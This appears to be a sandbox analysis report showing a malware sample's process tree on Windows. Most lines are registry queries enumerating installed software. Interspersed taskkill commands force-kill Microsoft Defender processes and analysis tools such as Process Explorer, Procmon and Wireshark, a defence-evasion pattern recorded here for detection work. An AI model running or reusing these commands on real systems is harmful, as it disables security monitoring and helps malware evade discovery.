C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:643⤵
- Checks for installed software on the system
PID:888
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:323⤵PID:1824
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:2024
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:643⤵
- Checks for installed software on the system
PID:1660
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:323⤵PID:1496
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:1064
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1076
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:643⤵
- Checks for installed software on the system
PID:2028
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}" /reg:323⤵PID:1984
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1764
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:643⤵
- Checks for installed software on the system
PID:1104
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:323⤵PID:608
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1644
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:643⤵
- Checks for installed software on the system
PID:1960
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:323⤵PID:1844
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1980
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:643⤵
- Checks for installed software on the system
PID:1904
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:323⤵PID:544
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1100
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:643⤵
- Checks for installed software on the system
PID:1492
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}" /reg:323⤵PID:1964
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:760
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:643⤵
- Checks for installed software on the system
PID:1572
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:323⤵PID:1976
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1620
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:643⤵
- Checks for installed software on the system
PID:1516
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:323⤵PID:1808
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1476
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:643⤵
- Checks for installed software on the system
PID:1860
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:323⤵PID:1120
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1380
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:643⤵
- Checks for installed software on the system
PID:1632
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:323⤵PID:1900
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:804
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:643⤵
- Checks for installed software on the system
PID:888
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:323⤵PID:1928
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1332
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:643⤵
- Checks for installed software on the system
PID:1496
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:323⤵PID:1536
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:576
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:643⤵
- Checks for installed software on the system
PID:1984
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:323⤵PID:2032
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1968
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:643⤵
- Checks for installed software on the system
PID:300
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:323⤵PID:2036
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1104
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:643⤵
- Checks for installed software on the system
PID:1932
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:323⤵PID:1036
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1844
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:643⤵
- Checks for installed software on the system
PID:1828
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:323⤵PID:1604
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpCmdRun.exe" /T /F2⤵
- Kills process with taskkill
PID:1648
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:892
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:643⤵
- Checks for installed software on the system
PID:1976
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:323⤵PID:1516
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1888
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:643⤵
- Checks for installed software on the system
PID:1860
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:323⤵PID:1636
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1632
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:643⤵
- Checks for installed software on the system
PID:1264
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:323⤵PID:1624
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1928
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:643⤵
- Checks for installed software on the system
PID:528
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:323⤵PID:332
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1948
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:643⤵
- Checks for installed software on the system
PID:1984
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:323⤵PID:1064
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1992
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:643⤵
- Checks for installed software on the system
PID:2036
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:323⤵PID:776
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1960
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:643⤵
- Checks for installed software on the system
PID:1904
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:323⤵PID:1492
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1956
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:643⤵
- Checks for installed software on the system
PID:848
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:323⤵PID:1976
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1056
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:643⤵
- Checks for installed software on the system
PID:1784
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:323⤵PID:1656
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1964
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:643⤵
- Checks for installed software on the system
PID:1556
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:323⤵PID:796
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:668
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:643⤵
- Checks for installed software on the system
PID:1264
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:323⤵PID:1692
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1800
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:643⤵
- Checks for installed software on the system
PID:332
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:323⤵PID:1528
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1796
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:643⤵
- Checks for installed software on the system
PID:1820
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:323⤵PID:2036
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1672
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:643⤵PID:1828
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:323⤵
- Checks for installed software on the system
PID:1492
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1680
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:643⤵PID:1168
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:323⤵
- Checks for installed software on the system
PID:1572
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1784
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:643⤵PID:1120
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:323⤵
- Checks for installed software on the system
PID:1900
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:796
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:643⤵PID:888
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:323⤵PID:1984
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "NisSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:1496
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1932
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:643⤵PID:2004
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:323⤵PID:1828
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:848
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:643⤵PID:1648
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:323⤵PID:1572
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1636
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:643⤵PID:1900
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:323⤵PID:1972
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:524
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:643⤵PID:1984
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:323⤵PID:2036
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:268
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:643⤵PID:2044
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:323⤵PID:1904
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1384
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:643⤵PID:2032
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:323⤵PID:1692
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1572
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:643⤵PID:1800
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:323⤵
- Checks for installed software on the system
PID:1952
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1888
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:643⤵PID:300
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:323⤵
- Checks for installed software on the system
PID:1956
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:544
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:643⤵PID:768
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:323⤵PID:1560
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1100
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:643⤵PID:1028
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:323⤵
- Checks for installed software on the system
PID:1332
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:608
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:643⤵PID:1672
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:323⤵
- Checks for installed software on the system
PID:2012
-
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:612
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:643⤵PID:1412
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:323⤵
- Checks for installed software on the system
PID:1840
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F2⤵
- Kills process with taskkill
PID:576
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F2⤵
- Kills process with taskkill
PID:1520
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F2⤵
- Kills process with taskkill
PID:1312
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F2⤵
- Kills process with taskkill
PID:1536
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F2⤵
- Kills process with taskkill
PID:2036
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F2⤵
- Kills process with taskkill
PID:1496
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F2⤵
- Kills process with taskkill
PID:1964
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F2⤵
- Kills process with taskkill
PID:1660
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F2⤵
- Kills process with taskkill
PID:892
-